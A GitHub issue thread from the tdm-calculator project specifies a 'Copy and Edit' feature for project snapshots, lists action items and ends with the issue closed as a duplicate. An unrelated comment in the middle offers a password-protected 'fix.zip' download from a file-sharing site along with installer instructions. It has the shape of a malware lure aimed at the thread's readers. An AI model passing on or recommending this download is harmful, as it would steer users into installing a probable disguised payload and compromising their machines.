### ISSUE TITLE
Implement the "Copy and Edit" Snapshot feature.

### ISSUE THREAD

**Issue by entrotech** [hackforla/tdm-calculator#1807]
### Overview
This feature allows a user to make a copy of a snapshot project based on the design outlined in Issue #1723. There are two use cases:

1. A user wants to make a new version of a project snapshot they own .  Snapshots are not editable, so they need to copy the existing project to a new draft project for editing.
2. A project has been shared with a user by the author, and the user needs to copy the snapshot to a draft they can edit. They will be the owner of the new draft project.

### Action Items
- [ ] Ask @hanselnoriega for specific links to the part of the Figma file with the up to date wireframes (the links in the design issue do not seem to take you directly to the correct page.
- [ ] The comments by Parisa on the design Issue sometime around mid-August 2024 describe the workflow, but Hansel may need to provide clarification.
- [ ] To get started, create a Copy and Edit button on the Wizard Summary Page that is only enabled for Snapshots.
- [ ] Implement the dialogs specified in Issue #1723. The workflow/wording is slightly different, depending on which of the above two use cases applies.
- [ ] You probably do not need to create any new back-end or database code.  See the handleCopyModalClose method in the ProjectsPage component for how the current copy logic works and modify slightly to meet the above use cases, the POST the new project using the /api/projects
- [ ] Prior to implementation of Issue #1700 and #1703, regular users will not be able to see snapshots shared with them, but you can simulate this by logging in as a user with the admin role, who can open other users' projects to try use case #2.
- [ ] A follow-up issue will allow users to copy a snapshot from the "kebab" menu on the My Project page.

### Resources/Instructions
This is related to Issues:
- #1700 
- #1703

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by entrotech** [comment]
- Duplicate of Issue #1795
